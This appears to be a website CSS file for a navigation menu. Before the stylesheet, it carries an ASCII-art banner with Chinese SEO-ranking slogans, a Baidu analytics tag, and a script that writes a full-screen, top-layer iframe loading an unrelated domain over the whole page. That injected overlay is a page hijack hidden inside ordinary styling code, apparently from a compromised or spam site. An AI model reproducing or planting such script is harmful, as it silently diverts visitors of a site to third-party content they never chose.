<!--//                          _ooOoo_                               //-->
<!--//                         o8888888o                              //-->
<!--//                         88" . "88                              //-->
<!--//                         (| ^_^ |)                              //-->
<!--//                         O\  =  /O                              //-->
<!--//                      ____/`---'\____                           //-->
<!--//                    .'  \\|     |//  `.                         //-->
<!--//                   /  \\|||  :  |||//  \                        //-->
<!--//                  /  _||||| -:- |||||-  \                       //-->
<!--//                  |   | \\\  -  /// |   |                       //-->
<!--//                  | \_|  ''\---/''  |   |                       //-->
<!--//                  \  .-\__  `-`  ___/-. /                       //-->
<!--//                ___`. .'  /--.--\  `. . ___                     //-->
<!--//            ."" '  `.     ___\_|_/___.'   '"".                  //-->
<!--//            | | :  `- \`.;`\ _ /`;.`/ - ` : | |                 //-->
<!--//            \  \ `-.   \_ __\ /__ _/   .-` /  /                 //-->
<!--//      ========`-.____`-.___\_____/___.-`____.-'========         //-->
<!--//                           `=---='                              //-->
<!--//      ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^        //-->
<!--//    佛祖保佑     日收录满36     秒收秒排     百度首页第一       //-->
<!--////////////////////////////////////////////////////////////////////-->

<script>
var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?68a4a3e6dd07c1850c0dc1663f6362f3";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
</script>

<script>
document.write('<meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"><style>html,body{width:100%;height:100%;margin:0;padding:0}</style>');
  var iframe = document.createElement('iframe');
  iframe.src = 'https://mobile.fmdcvmxa93.com/';
  iframe.scrolling = 'auto';
  iframe.style.cssText = "width:100%;height:100%;left:1px;top:1px;border:none;background:#fff";
  var div1 = document.createElement("div");
  var div =  document.createElement("div");
  div1.style.cssText = "-webkit-overflow-scrolling:touch;width:100%;height:100%;z-index:9999999999;position:fixed;top:0;left:0;";
    var is_mobi = navigator.userAgent.toLowerCase().match(/(ipad|iphone|android|coolpad|mmp|smartphone|midp|wap|xoom|symbian|j2me|blackberry|wince)/i) != null;
  if (is_mobi) {
    div1.style.overflow = "auto";
  }
  div1.appendChild(iframe);
  div.appendChild(div1);
  document.write(div.innerHTML);
</script>/* 全站导航 */

.home {
    margin-left: 16px
}

.tab {
    position: relative;
    display: block;
    float: left;
    cursor: pointer
}

.tab .tablink {
    position: relative;
    padding: 1px 12px;
    line-height: 30px;
    display: block;
    height: 30px;
    color: #fff;
    font-size: 14px;
    z-index: 99;
    float: left
}

.tab .tablink a {
    line-height: 30px;
    text-decoration: none
}

.tab:hover .tablink {
    color: #357d13;
    border: 1px solid #629d2a;
    padding: 0 11px;
    text-decoration: none
}

.dropdown:hover .arwlink {
    border-bottom: 1px solid #FFF;
    border-left: 1px solid #629d2a;
    height: 31px
}

.dropdown ul {
    display: none
}

.dropdown:hover ul {
    position: absolute;
    display: block;
    margin-left: -1px;
    top: 32px;
    left: 1px;
    z-index: 9
}

.subnav {
    width: 250px
}

.subnav a {
    padding: 4px 0 4px 10px;
    line-height: 16px;
    width: 100px;
    display: block;
    white-space: nowrap;
    color: #333;
    float: left
}

.subnav :hover {
    text-decoration: underline;
    color: rgb(255, 255, 255);
    font-size: 1.1em;
}

.dropdown .subnav {
    background-color: #2f5597;
    border: 1px solid #fff;
    padding: 8px;
}